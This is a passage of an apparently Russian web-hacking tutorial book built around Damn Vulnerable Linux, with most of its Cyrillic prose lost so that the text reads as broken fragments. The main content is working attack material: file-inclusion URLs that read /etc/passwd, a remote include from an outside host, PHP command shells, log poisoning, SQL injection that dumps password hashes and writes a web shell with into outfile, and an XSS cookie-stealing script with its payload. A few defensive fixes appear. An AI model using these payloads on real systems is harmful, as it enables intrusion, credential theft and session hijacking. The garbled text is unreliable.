Contents (table of contents; most entry titles were lost in extraction, numbering and page numbers are kept where legible)
I.
01. ... 12
02. ... 16
II. ... 25
03. ... 26
04. ... 31
05. SQL- ... 47
06. ... 59
07. SQL- ... 70
    MySQL @@version ... 71
    mysql.user ... 71
    ... 72
    ... 72
    / ... 73
    SQL- NaboPoll ... 74
    ... 79
    ... 80
    ... 81
08. ... 83
    /proc/self/environ ... 83
    Apache ... 84
    ... 84
09. CRLF- ... 86
III. ? ... 87
0. ... 88
0. ... 94
. ... 102
    ... 102
    LDAP- ... 105
    ... 106
0D. ... 109
0. ... 118
... 124
... 128
... 140
3. Cyphor ... 144
4. SQL- Cyphor ... 150
5. SQL- MS SQL Jet ... 152
6. nabopoll.php ... 155
7. SQL- MS Access ... 157
8. instantCMS ... 158
9. SQL- ... 161
10. ... 166
,
. ( ,
, ),
- -,
.
, .
,
.
, , ,
,
.
Linux (
Windows), ,
Linux, .
,
( , , ,
, ). ,
, , ,
,
.
( ,
).
,
1995 1999
( , ,
; DVD-
Damn Vulnerable Linux, BackTrack 4.
, 02.
' .
, ,
11 .
,
rompnOpH.ei.eom ( , ).
!
-
http:; / www.pltei.rom,
01.
02.
*nix
Unix-like operating systems (e.g. AIX, HPUX, SunOS, Solaris, Linux, FreeBSD, OpenBSD, NetBSD).
Windows
Microsoft ,
Windows. , , ,
.
-
:
-? -
. , , ,
- .
- -,
. ,
, ,
, , ,
.
- , , ,
,
( ).
- ,
. , ,
-,
.
-:
( );
;
;
( covey auwku,
).
.
. -
Hacked by . :^\*
. .). , , .
-
.
( .)
. )}*'
. ,
. , se fc ^'rm
.
,
(
Windows) ( *nix).
, ,
.
, .
-
.
. - .
. . .
, -
, .
, . .
- , .
, -
.
, ?
.
01.
, , IP . - (proxy),
,
( ). ,
. ,
, .
,
. (),
, -
. ,
-, .
-
, , ,
.
,
, . ,
- ftp-.
free proxy list
.
, IP - (, www.2ip.ru), , , .
, ,
!
.
, SocksChain
Ufasoft,
.
.
(Virtual Private Network, VPN). ,
(
VPN ). VPN
.
. ,
,
,
. ,
. ru.
, www.hidemyass.com.
.
,
( ), .
* .
.
, ,
,
. (.gov)
( .mil) , (.edu).
( , )
( ). ,
.
,
.
. ,
(live-CD) .
.
( )
. , , ,
,
.
,
.
.
,
, ,
.
----------------------------------------------------------------
( ) DVD.
512 .
- BackTrack
www.backtrack-linux.org ,
. 4 VMware,
Ubuntu,
, ,
,
. ,
VMware Player
(screenshot: the Welcome to VMware Player start screen with the Open option)
Fig. 02.2. New Virtual Machine Wizard, step 1: Install from: Installer disc (Help, Next >, Cancel)
3. , . 02.3,
Next.
4. (. 02.4)
. ,
D V L D am nV ulnerahlcLinux,
. Next.
Fig. 02.3. Guest Operating System selection, step 2 (< Back, Next >, Cancel)
Fig. 02.4. Naming the virtual machine, step 3 (Next >, Cancel)
2 , 8
(
). *
, 2 , Split virtual
disk into 2 GB files, .
, , 2 ,
. Next
New Virtual Machine Wizard
Specify Disk Capacity
How large do you want this disk to be?
The virtual machine's hard disk is stored as one or more files on the host computer's physical disk. These file(s) start small and become larger as you add applications, files, and data to your virtual machine.
Maximum disk size (GB): 8.0
Split virtual disk into 2 GB files
Splitting the disk makes it easier to move the virtual machine to another computer.
Help   < Back   Next >   Cancel
Fig. 02.5. Specify Disk Capacity, step 4
, Finish ( 02.6).
512 , 250
Damn Vulnerable Linux .
Customize Hardware.
. 02.7. ,
(796 ).
2 ( ), ; ><
. , ,
- Auto
detect (). , , , '( ,
, . 02.0.111
Finish, .
Ready to Create Virtual Machine
Click Finish to create the virtual machine and start installing Other Linux 2.6.x kernel.
The virtual machine will be created with the following settings:
Name:
Location:
Version:
Operating System:
Hard Disk: 8 GB, Split
Memory: 256 MB
Network Adapter: NAT
Other Devices: CD/DVD, Floppy, USB Controller, Sound Card
< Back   Finish   Cancel
Fig. 02.6. Ready to Create Virtual Machine, step 5
Fig. 02.7. Hardware dialog (Device / Summary): Memory 256 MB, Processors, New CD/DVD (Auto detect), Floppy (Using drive A:), Network Adapter (NAT), USB Controller (Present), Sound Card (Auto detect), Display; memory slider from 32 MB to 32768 MB; Add..., OK, Cancel, Help
. 02.8. Removable Devices (
), .
I Finished Installing ( *),
Linux
. ,
Ctrl, . , 6 (
Ctrl+G
).
, Ctrl+Alt (Ctrl Alt ).
Fig. 02.8. Console of the virtual machine after boot (window title "Other Linux 2.6.x kernel - VMware Player"; texhash: ... Updating ... Done; "Login as 'root', with password 'toor', all lowercase")
root, Enter.
(password) toor ( root )
Enter. ,
:
bt ~ #
bt , # , .
# $.
Linux.
Linux , ,
Enter.
KDE startx
Enter. :
bt ~ # startx
, .
Linux, , Windows
( , Windows),
.
- ,
,
( Linux),
, .
Fig. 02.9. KDE desktop of Damn Vulnerable Linux running in VMware Player
,
. 02.9.
KDE.
Firefox ( )
. , Windows-.
( ),
(de). ,
,
.
,
.
(Ctrl+Alt),
VM Power Suspend.
.
VMware Player.
Back Track 4,
, , ,
Linux Ubuntu, Linux,
I Finished Installing (
-).
II. -
03.
04. -
05. SQL-
06.
07. SQL-
08. -
09. CRLF-
- - -,
. - .
.
. (bug) .
- -,
.
,
(, ).
,
, Linux- -. ,
DVL , http- (-
Apache). HTTPD (
). Konqueror (
Windows). Start HTTPD
. , - . ,
Konqueror , -.
( http ://) Location
Enter.
Board51,
- (http://localhost). (Firefox Konqueror)
http://localhost/webexploitation_package_02/board51/board.php
, , (. 03.1).
, ,
, ,
nix-. Windows
(, D) D:\Inetpub\wwwroot\board51\.
, -
Apache ( - *-,
Fig. 03.1. Board51 (Windows). The board page shows PHP warnings such as "... is not a valid stream resource in /usr/local/apache/htdocs/webexploitation_package_02/board51/board.php on line 39", and its last entry: "letzter Eintrag 03 Oct 2002 05:10:13 von Admin".
, - ,
- (-) . ,
, (Internet Explorer, Opera, Firefox etc.), ,
-. - -
(, ), -,
, . .
, . Board51
, .
, , ,
. boarddata/data/user.idx
, , ICQ.
, ,
. ( . , ,
,
.)
http://localhost/webexploitation_package_02/board51/boarddata/data/user.idx
(screenshot: user.idx as displayed in the browser)
index.php?lang=rus (. ). InsidePro. .
,
,
().
21232f297a57a5a743894a0e4a801fc3
- .
webexploitation_package_02/board51/
( .
(admin)
.
(Warning), ,
? ? .
(. 03.4).
! . . 2
';
.
Fig. 03.3. Online hash lookup service (InsidePro): hash search form with CAPTCHA
Fig. 03.4. Board51 after logging in as Admin (Neues Forum, Konfiguration, Abmelden; "Angemeldet als Admin", "Besucher online: 1", "letzter Eintrag 03 Oct 2002 05:10:13 von Admin")
, IP - .
. , , .
IP - ,
. ,
TCP/IP, IP-, .
IP 4 IP- (
0 254), , :
192.168.2.11. () IP -, ,
127.0.0.1.
, .
1 65 535.
, .
- , , .
, - 80, FTP 21.
, ,
, , . ,
, , 1-
, . ,
-, IP 80,
, -. -, ,
IP- ( , )
-.
.
, -,
, include() , -
. ,
. ( . include
[-]). (Local File Include,
LFI) (Remote File Include, RFI).
.
, ,
HTTP FTP .
, ,
. .
-
. :
http://[target]/index.php?page=./../etc/passwd%00
[target] ,
www.site.com. /etc/passwd.
:
. / ;
.. / , Unix- .
HTTP (null-byte).
. ,
,
.php .txt.
: /etc/passwd.php, .
, .
index.php . , Damn Vulnerable Linux
- /usr/local/apache/htdocs/. ,
(
.. /) 4 , .
, htdocs,
. ,
-,
, ,
.
/usr/local/apache/htdocs/
-. ,
, -,
.
( Windows)
Damn Vulnerable Linux Tools Editors Kate,
Kate ( , ,
). Default Session (
, , , DVL).
( ^!)):
<?
// Deliberately vulnerable include: the page name comes straight from the request
$page = $_GET['page'];
include("/htdocs/$page.php");
?>
(-)?
. , , .
$,
, .
htdocs (
$)
.php. . ,
( ) . ,
, ,
. ( File Save)
/usr/local /apache/htdocs. ,
, Enter
. .
my.php , Save. 11
, .php.
. .
(Firefox Konqueror)
:
http://localhost/my.php?page=./../etc/passwd%00
localhost
( : www.site.com).
, . 04.1,
Fig. 04.1. /etc/passwd displayed through my.php (Konqueror)
!
.. / ,
http://localhost/my.php?page=/etc/passwd%00
http://localhost/my.php?page=./../../../etc/passwd%00
,
/etc/passwd, . 04.2.
! !
/etc/passwd , :
. .
View View Document Source ( Konqueror)
View Page Source ( Firefox)
(. 04.3).
Fig. 04.2. /etc/passwd loaded via http://localhost/my.php?page=./../../../../../etc/passwd%00 (Konqueror, Page loaded)
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:
news:x:9:13:news:/usr/lib/news:
Fig. 04.3. /etc/passwd as seen in the page source
/etc/passwd? ,
() .
. (
root). root (
) 0 0.
. ,
/etc/shadow ( FreeBSD
: /etc/master.passwd). /etc/shadow,
, , ,
.
? , .
,
, /etc/shadow.
, .
/etc/shadow
root , root.
,
. , ,
,
( ). ,
Linux - /etc/shadow
.
http://localhost/my.php?page=./../etc/shadow%00
, ,
root, - Apache, ,
,
Permission denied ( , ).
/etc/shadow ,
.
00 (
)
http://localhost/.php?page=./.. / . . / . . / . . / . . /etc/passwd00
, . /etc/shadow, ,
? ?
-------------------------------------------------------------
. .
-
,
, ,
.
, *nix, .
http://[target]/inj.php?inc=http://narod.ru/cmd.txt&cmd=ls
cmd.txt
http://narod.ru. ls,
.
(File New)
:
<?
// Deliberately vulnerable: any path or URL from the request is included as-is
$page = $_GET['page'];
include("$page");
?>
-.
my.php
inj.php (File Save As) , my.php.
, include htdocs
. php, ,
. ,
.
, (,
FTP). .
<pre>
<?php
// $cmd arrives via register_globals; the output is wrapped in <pre> to keep line breaks
print("<b>$cmd</b>\n");
system($cmd);
?>
</pre>
cmd.php , inj.php.
HTML <pre> </pre> ,
(
). print $cmd
,
. system() ,
$cmd, .
, ,
:
http://localhost/inj.php?page=http://localhost/cmd.php?cmd=ls
, - . 04.4.
ls,
.
, -
, .
inj.php cmd.php,
Parse error: , , ,
.
.
Fig. 04.4. Output of ls (base, cmd.php, index.php, info.php, inj.php, manual, my.php, olate, phpmyadmin, unicornscan, webexploitation_package_01, webexploitation_package_02)
, ls *-.
, uname ( Unix-,
).
pwd (print working directory
) id ( ).
, nobody (
uid=99), nogroup (
gid=99). , ,
groups. , Linux-
- nobody.
dir, , ls,
, .
, ,
.
, .
, ( . shell ) *nix-,
(). *nix ,
Windows, CMD.exe. *nix-
bash sh.
, *nix- . Unix
(-), (--)
. , uname -
Unix-. ,
. , ls -l
,
( *nix
).
----------------------------------------------------------------------_
Linux Unix ,
- .
,
ls -al ls -la. -
. ,
.
? Linux $IFS,
().
ls$IFS-l . , ,
! . 04.5.
-:
<pre><? system($_GET['cmd']); ?></pre>
, + ,
ls -la ls+-la. .
. 04.5 .
(total). drwxr-xr-x? d
, (-).
, ,
, ,
:
r (read);
w (write);
x (execute).
:
-rw--w-- 1 bob csc532 70 Apr 23 20:10 file
drwx------ 2 sam Al 2 May 01 12:01 directory
To
( , . 04.5
root, , , bob sam).
, .
Fig. 04.5. Output of ls$IFS-la in Konqueror: a directory listing (total 37) with entries such as base, beef, cmd.php, cmd.pl, cmd.txt, index.php, info.php, inj.php, manual, my.php, olate, phpmyadmin, unicornscan, webexploitation_package_01 and webexploitation_package_02, all owned by root
() ,
. . 04.5 root (
).
, ,
. ,
. , , , abc
(d), root root:
drwxr-xr-- 10 root root 107 Jan 18 2009 abc
, (rwx),
, (-),
(--). , 18 2009
(Jan 18 2009).
ls -lad.
.
( root) chown
.
() chmod. ,
, ( 7) ,
( 5) (
):
2 ;
3
5 ;
6
(, ).
( root)
, .
- . cat
, . ,
cat /etc/passwd /etc/passwd. ,
- : cat$IFS/etc/passwd
: cat+/etc/passwd.
*nix, *nix.
1.
-
NaboPoll
NaboPoll
( survey.inc.php, path) ,
( , , ) .
,
, :
http://localhost/webexploitation_package_02/nabopoll/survey.inc.php?path=http://localhost/cmd.php?cmd=ls%00
. 04.6.
Fig. 04.6. Output of ls through NaboPoll's survey.inc.php (base, cmd.php, cmd.pl, cmd.txt, images, index.php, info.php, inj.php, manual, my.php, olate, phpmyadmin, unicornscan, webexploitation_package_01, webexploitation_package_02)
-
Apache
, *
, () Apache. ,
Apache httpd-access.log httpd-error.log,
- (
access_log, error_log).
DVL: access_log,
/usr/local/apache/logs. ,
-,
, :
...?page=.../logs/access_log%00
access_log.
telnet 80 :
telnet 127.0.0.1 80
:
access_log:
127.0.0.1 - - [30/Jun/2010:13:00:40 +0200] "GET <pre><?passthru($_GET['cmd']);?></pre> HTTP/1.1
bt ~ # telnet 127.0.0.1 80
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
GET <pre><? passthru($_GET['cmd']);?></pre> HTTP/1.1
HTTP/1.1 400 Bad Request
Date: Sun, 27 Jun 2010 19:46:58 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>400 Bad Request</TITLE>
</HEAD><BODY>
<H1>Bad Request</H1>
Your browser sent a request that this server could not understand.<P>
The request line contained invalid characters following the protocol string.
<P>
<HR>
<ADDRESS>... Server at ...</ADDRESS>
</BODY></HTML>
Connection closed by foreign host.
Fig. 04.7. Sending the request to Apache with telnet
- , ,
,
, , .
, , accessjog,
.
, GET, .
- Referer User-Agent,
( !):
bt ~ # telnet 127.0.0.1 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET / HTTP/1.1
Accept: */*
Accept-Language: ...
Accept-Encoding: ...
User-Agent: Lynx/2.8.Brel.1 libwww-FM/2.14
Host: 127.0.0.1
Connection: Close
Referer: http://127.0.0.1/<pre><?passthru($_GET['cmd']);?></pre>
I I Enter.
Referer, User-Agent.
:
http://localhost/index.php?page=./../logs/access_log%00&cmd=ls+-la
+, ls -la.
.
access_log,
(. 04.8).
, error_log . ,
ftpd ( FTP),
, Apache, - ( ,
Fig. 04.8. access_log displayed through the include
- ).
, , ,
txt, 1 . .
, .
. , .
- <pre><? passthru($_GET['cmd']); ?></pre>, avatar.gif
, :
http://[target]/forum.php?page=./../smileys/avatar.gif & s
.
, avatar.gif ,
- .
-
-. :
/logs/error.log
/logs/access.log
/logs/error_log
/logs/access_log
/var/log/error_log
/var/log/access_log
/var/log/error.log
/var/log/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/httpd/error.log
/var/log/httpd/access.log
/var/log/httpd/error_log
/var/log/httpd/access_log
,
(switch case). -:
<?php
// Whitelist: only the pages named in the switch can ever be included
global $page;
switch ($page)
{
    case '':
        include ("pages/main.php");
        break;
    case 'index':
        include ("pages/main.php");
        break;
    case 'page1':
        include ("pages/page1.php");
        break;
    case 'page2':
        include ("pages/page2.php");
        break;
    default:
        include ("pages/error.php");
        break;
}
?>
str_replace().
, php.ini
:
allow_url_include = Off
allow_url_fopen = Off
register_globals = Off
magic_quotes_gpc = On
safe_mode = On
//
// fopen
//
// " " (00)
// safe_mode.
/ / /etc/passwd
PHP-,
:
<?php
// Strip the slashes magic_quotes adds, element by element (recursing into nested arrays)
function stripslashes_for_array(&$array)
{
    reset($array);
    while (list($key, $val) = each($array))
    {
        $array[$key] = is_array($val) ? stripslashes_for_array($val) : stripslashes($val);
    }
    return $array;
}
if (!get_magic_quotes_gpc())
{
    stripslashes_for_array($_POST);
    stripslashes_for_array($_GET);
}
if (isset($_GET['file'])) $file = $_GET['file'];
else
{
    $file = 'news';
}
include("include/" . $file . ".php");
?>
stripslashes(), . ,
. ('../'
'.') str_replace(). (
file_exists()), $file='news'.
.
- ,
-, , .
.
SQL-
SQL- Cyphor.
http://localhost/webexploitation_package_02/cyphor/ .
. 05.1.
Fig. 05.1. Cyphor forum front page: My Discussions, Login ("Guest access granted. You have to register if you want to post messages."), Search, Forums
newmsg.php. .
e x it.
# ( . 05.2 )
. .
. ,
Cyphor
.
, , newmsg.php SQL fid ( SQL-
Fig. 05.2. newmsg.php source in a text editor: it includes include/db_mysql.php, include/settings.php, include/global.php and the language file lang/$language.php, calls open_session(), then login($login, $pass) when both are set and otherwise exits with the "not logged in" message
(SQL-injection)? SQL,
. SQL (Structured Query Language
) . SELECT
. , SELECT id, password
FROM users id password users, SELECT * FROM
users users.
, (,
). SQL-, INSERT (
) UPDATE (, ),
, .
UNION . :
SELECT fid, title FROM forums UNION SELECT nick, password FROM users
,
. , UNION
,
. , ,
SELECT, .
.
(1, 2, 3...), (
), (null)
SQL-. .
( FROM),
, .
, cyphor_users,
:
http://localhost/webexploitation_package_02/cyphor/newmsg.php?fid=-1 union select 1 from cyphor_users
,
, . SQL,
( ) MySQL,
/* ( --),
. . 05.3.
Fig. 05.3. Cyphor's response to the injected query: "Not logged in!" and "Database error: 1222 (The used SELECT statements have a different number of columns)"
, SQL
( ), ,
.
,
(%20). ,
(+) /**/,
.
, .
(union select 1,2,3,4 from cyphor_users),
(. 05.4). ,
, .
Fig. 05.4. New message form returned for union select 1,2,3,4 from cyphor_users (From: and Subject: fields)
2.
nick ( ,
Cyphor). . 05.5
( admin).
Fig. 05.5. union select 1,nick,3,4 from cyphor_users: the From field of the form shows the first nick
2 password
admin (. 05.6).
Cyphor crypt() ,
(
Fig. 05.6. The admin user's password hash displayed in the form
).
, ,
Cyphor ,
8 , ,
. ,
DES,
John The Ripper (. ). , Cyphor
( ),
(. 3).
MySQL ( ),
MySQL . , ,
version(), user() database().
concat_ws:
concat_ws(0x3a,version(),user(),database())
().
:
5.0.24:root@localhost:cyphor
concat, :
concat(name,0x3a,id)
,
group_concat, :
group_concat(password)
Cyphor,
, ( ).
/etc/passwd.
MySQL load_file('/etc/passwd').
( ),
:
load_file(0x2f6574632f706173737764)
,
(. 05.7).
Fig. 05.7. /etc/passwd read through load_file(): the forum title field shows root:x:0:0::/root:/bin/bash followed by the remaining entries (bin, daemon, adm, lp, sync, shutdown, halt, mail, news, uucp, operator, games, ftp, smmsp, mysql, rpc, sshd, gdm, pop, nobody, postgres)
2 SQL- show.php,
4 SQL-
.
.
,
SQL-:
param=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14
,
SQL- , 1. ,
.
, SQL-
:
param=1+union+select+1,2,concat(user_name,0x25,password,0x25,email),4,5,6,7,8,9,10,11,12,13,14,15 from p_user
,
, (-- /*),
. ? LIMIT,
.
:
param=1+union+select+1,2,concat(user_name,0x25,password,0x25,email),4,5,6,7,8,9,10,11,12,13,14,15 from p_user LIMIT 0,1
.
1 ( ), WHERE:
select ... into outfile ,
-.
/usr/local/apache/htdocs/ chmod 777 cyphor.
cyphor. ,
. nobody,
Apache, ,
. ,
, images include.
. select ... into outfile
, SELECT, .
SQL- newmsg.php.
:
http://localhost/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 1,concat_ws(0x3a,nick,password),3,4 from cyphor_users into outfile '/usr/local/apache/htdocs/webexploitation_package_02/cyphor/user.txt'
, ,
http://localhost/webexploitation_package_02/cyphor/user.txt,
(. 05.8). <
admin .
Fig. 05.8. user.txt served by Apache: the admin nick followed by its password hash
, . , i i/
, ( I )
4 , ( k o i
,
2). i </,
, .
-
, outfile
-.
hex. . :\
union select 1,2,3,4 :
hex("<pre><?
. 05.9 ,
.
Fig. 05.9. The injected query using hex() as shown in the Konqueror location bar
( ) ,
,
( ).
( ):
http://localhost/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 0x3C7072653E3C3F2073797374656D28245F4745545B27636D64275D293B3F3E3C2F7072653E,null,null,null into outfile '/usr/local/apache/htdocs/webexploitation_package_02/cyphor/shell.php'
-
shell.php, ,
, :
http://localhost/webexploitation_package_02/cyphor/shell.php?cmd=ls+-la
. 05.10.
,
, , SQL . ,
.
SQL-? .
DVL - ( :
sql injection).
, .
.
(, ComicShout v.2).
Fig. 05.10. Output of shell.php?cmd=ls+-la (total 74; entries admin, cyphor.css, doc and others, owned by root)
SQL-
, , , SQL-.
, show.php
Cyphor. :
$message_mode = 1;
:
$id = intval($id);
if (!$id)
{
    die("<br><h1>Hacking attempt!</h1>");
}
, i d,
, . ,
.
. 05.11.
, fid,
.
, ,
. :
$text_to_check = mysql_real_escape_string($_GET["запрос"]);
$text_to_check = strip_tags($text_to_check);
$text_to_check = htmlspecialchars($text_to_check);
$text_to_check = stripslashes($text_to_check);
$text_to_check = addslashes($text_to_check);
$_GET["запрос"] = $text_to_check;
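The integer cast and the bound parameter, as an added example written for this page (it is not Cyphor's code): a numeric id such as fid is accepted only when it is a plain positive integer, and values that must stay strings reach the database as bound parameters of a prepared statement instead of being pasted into the SQL text. The table layout, the SQLite in-memory database and the function names sanitize_id, find_forum, build_demo_db and run_self_test are assumptions of this example.

```php
<?php
// Added example (not Cyphor's code): the two defences this chapter points at
// for the fid/id parameters of newmsg.php and showmsg.php.
// 1. An integer id is validated and cast, and rejected when it is not a
//    positive number (the idea behind Cyphor's intval() + die() fix).
// 2. Anything else is passed as a bound parameter of a prepared statement,
//    so "union select ..." can never become part of the SQL text.
// Table, function names and the SQLite fixture are this example's own.

// Return the id as a positive integer, or null when the parameter is not a
// plain decimal number (e.g. "-1 union select 1,nick,3,4 from cyphor_users").
function sanitize_id($raw)
{
    if (!is_string($raw) || !preg_match('/^[1-9][0-9]*$/', $raw)) {
        return null;
    }
    return (int) $raw;
}

// Look up a forum row by id through a bound parameter; the driver sends the
// value separately from the statement, so no quoting or keyword filter is needed.
function find_forum(PDO $db, $raw_id)
{
    $id = sanitize_id($raw_id);
    if ($id === null) {
        return null;   // the equivalent of Cyphor's "Hacking attempt!" branch
    }
    $stmt = $db->prepare('SELECT fid, title FROM forums WHERE fid = :fid');
    $stmt->execute(array(':fid' => $id));
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed fixture: a tiny forums table plus a users table holding a
// constructed password hash, to show that the injected query cannot reach it.
function build_demo_db()
{
    $db = new PDO('sqlite::memory:');
    $db->exec('CREATE TABLE forums (fid INTEGER PRIMARY KEY, title TEXT)');
    $db->exec('CREATE TABLE users (nick TEXT, password TEXT)');
    $db->exec("INSERT INTO forums VALUES (1, 'General')");
    $db->exec("INSERT INTO users VALUES ('admin', 'CONSTRUCTED-HASH')");
    return $db;
}

function run_self_test()
{
    $db = build_demo_db();
    $ok = find_forum($db, '1');
    $injected = find_forum($db, '-1 union select 1,password,3,4 from users');
    return $ok !== null && $ok['title'] === 'General' && $injected === null;
}

echo run_self_test() ? "id handling ok\n" : "self-test failed\n";
```

The regular expression does the work that intval() only approximates: intval("1 union select ...") still yields 1, whereas the pattern rejects anything that is not purely digits, and the prepared statement covers the string columns the cast cannot protect.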
Fig. 05.11. show.php answers "Hacking attempt!" to the injected id (Konqueror, Page loaded)
SQL
select, union, order, char, where, from.
,
, .
(, ):
ini_set('display_errors', 0);
.
. ,
, , ,
SQL-. 5:
$section = $_GET['section'];
$result = mysql_query("SELECT * FROM `tbl_name` WHERE `section` = '$section'");
if (!$result || mysql_num_rows($result) == 0) {
}
(wo
, '' ftjp ,
^, \ ),
, \ >
.
(CMS), \>
,
'' , ( (
shell,
, SQL , ,
,
.
* cam
. ,
ii\\Sv}l:
http://www.site.net/module.php?id=-1 union select 1,user(),-1
XSS
cookie-
.
cookie ( )?
, .
cookie-
, -
XSS, , XSS ^
, - /, ( ~
. ^ -
, , 11 %'SMi &
, !.
.
, , ,
search, . 11
,
:
script.php?search=[...]
, html
, :
script.php?search=<b>Hacked</b>
,
, Hacked.
, <marquee> </marquee>,
, <hl> </hl>, ' /
. ,
. .
, ,,
- - .
<b>Hacked</b> cookie (
). , ,
,
( , %3 ):
script.php?search=%3cmarquee%3eHacked%3c/marquee%3e
,
GET:
script.php?search=<b>Hacked</b>
,
POST, . html, POST.
, javascript-,
.
html-. ,
XSS-. ,
, html-,
. XSS-
.
. ,
, .
,
, ( ) .
( ).
, ,
html-, html, ,
.
, :
<script>alert('Hacked by Vasya!')</script>. XSS
Hacked by
Vasya!
XSS- ; ,
, ,
, , .
-,
XSS
-. XSS.
name.php :
<?php
// Deliberately vulnerable: the name is echoed into the page unescaped
$name = $_GET['name'];
echo "Your name is $name";
?>
/usr/local/apache/htdocs.
form.html :
<form action="name.php" method="GET">
<input type=text name="name">
<input type=submit value="OK">
</form>
() name.php.
http://localhost/form.html (. 06.1), (, Vasya)
.
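As an added example (not the book's code), here is name.php with the one change that removes the XSS: the value is passed through htmlspecialchars() before it is echoed, so the payloads shown in this chapter are displayed as text instead of being interpreted as markup. The helper names h, render_greeting and run_self_test are this example's own.

```php
<?php
// Added example (not from the book): name.php rewritten so that the value
// of ?name= is HTML-escaped before it is echoed. Function names are this
// example's own.

// Escape a value for insertion into HTML text. ENT_QUOTES also escapes
// single quotes, so the output is safe inside attribute values as well.
function h($value)
{
    return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
}

// The hardened counterpart of   echo "Your name is $name";
function render_greeting($name)
{
    return 'Your name is ' . h($name);
}

// Constructed inputs: the payloads shown in this chapter, and what the
// browser now receives for each of them.
function run_self_test()
{
    $cases = array(
        'Vasya'                                      => 'Your name is Vasya',
        '<h1>Hacked</h1>'                            => 'Your name is &lt;h1&gt;Hacked&lt;/h1&gt;',
        "<script>alert('Hacked by Vasya!')</script>" => 'Your name is &lt;script&gt;alert(&#039;Hacked by Vasya!&#039;)&lt;/script&gt;',
        '<script>alert(document.cookie)</script>'    => 'Your name is &lt;script&gt;alert(document.cookie)&lt;/script&gt;',
    );
    foreach ($cases as $input => $expected) {
        if (render_greeting($input) !== $expected) {
            return false;
        }
    }
    return true;
}

if (PHP_SAPI === 'cli') {
    echo run_self_test() ? "all payloads neutralised\n" : "self-test failed\n";
} else {
    echo render_greeting(isset($_GET['name']) ? $_GET['name'] : '');
}
```

Escaping at the point of output is what makes the difference: the same string is still stored and still reaches the page, but `<` and `>` arrive as `&lt;` and `&gt;`, so the browser has nothing to execute.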
Fig. 06.1. form.html in Konqueror (text field and OK button)
name.php , . 06.2.
, form.html
<h1>Hacked</h1>, Hacked,
. 06.3.
-, XSS
Fig. 06.2. name.php?name=Vasya
Fig. 06.3. name.php with <h1>Hacked</h1> as the name: "Your name is" followed by Hacked rendered as a heading
.
Fig. 06.4. alert() box "Hacked by Vasya" from the injected script (the location bar shows the URL-encoded %3C%2Fscript%3E)
.)
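The same reflection can be reproduced without a web server. The script below is an added example and is not code from the book: render_vulnerable() does what name.php does, render_safe() escapes the parameter with html.escape() before echoing it, and name_from_url() performs the URL decoding the web server does before PHP sees the value, so that the %3C/%3E form of a payload can be shown to be identical to the raw form.

```python
import html
from urllib.parse import parse_qs, urlsplit

PAYLOAD = "<script>alert('Hacked by Vasya!')</script>"

def name_from_url(url):
    """Extract the name parameter the way the server hands it to PHP: already URL-decoded."""
    query = urlsplit(url).query
    return parse_qs(query, keep_blank_values=True).get("name", [""])[0]

def render_vulnerable(name):
    """name.php as printed in the book: the parameter is echoed as raw HTML."""
    return "Your name is %s" % name

def render_safe(name):
    """Escape <, >, &, ' and " so the browser shows the text instead of parsing it."""
    return "Your name is %s" % html.escape(name, quote=True)

def contains_script_tag(page):
    """True if the output still carries an executable <script> element."""
    return "<script" in page.lower()

if __name__ == "__main__":
    raw = "http://localhost/name.php?name=" + PAYLOAD
    encoded = "http://localhost/name.php?name=%3Cscript%3Ealert('Hacked by Vasya!')%3C%2Fscript%3E"
    for url in (raw, encoded):
        name = name_from_url(url)
        print(render_vulnerable(name))
        print(render_safe(name))
```

The escaped output reads "Your name is &lt;script&gt;..." in the HTML source, which the browser displays as the literal text of the payload; the escaping has to happen at the point where the value is written into HTML, not at the point where it is received.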
Stealing cookies

If the page reflects script, it reflects a script that reads the cookie. The simplest check is

    <script>alert(document.cookie)</script>

which pops up the visitor's cookie for the current site (fig. 06.5). The cookie usually holds the session identifier and sometimes a login and password hash, so an attacker wants it sent to a server he controls rather than shown to the victim. On the Damn Vulnerable Linux (DVL) test box a receiving script, steal.php, can be as short as this:

    <?php
    // Whatever follows the ? in the URL: the victim's cookie, sent by the JavaScript below
    $query = $_SERVER['QUERY_STRING'];
    $query .= "\n";
    // The file the cookies are appended to
    $db = "/tmp/cookies.txt";
    // Open for appending (the file is created if it does not exist) and write the line
    $fh = fopen($db, "a+");
    fputs($fh, "$query");
    fclose($fh);
    // Nothing is shown to the victim; a real attacker would redirect back to
    // the original page here so that nothing looks out of place
    ?>
The script writes the incoming query string to cookies.txt. Put steal.php in /usr/local/apache/htdocs. The log goes to /tmp rather than the web root because Apache runs as the user nobody, which cannot write to /usr/local/apache/htdocs but can write to /tmp. The JavaScript that sends the cookie is:

    <script>document.location.replace('http://localhost/steal.php?com='+document.cookie);</script>

document.location.replace() navigates the browser to the given URL; the URL is steal.php with the cookie appended after ?com=, so the cookie arrives in the query string (QUERY_STRING) and steal.php appends it to cookies.txt. Enter that script into form.html and press OK: the browser is sent to steal.php, and

    cat /tmp/cookies.txt

shows the captured cookie (fig. 06.6). Some values in it may be base64-encoded; decode them before use.
[Fig. 06.6. cat /tmp/cookies.txt: a URL-encoded line containing a PHPSESSID value, phpbb2mysql_sid=<session id> and phpbb2mysql_data=a%3A0%3A%7B%7D]
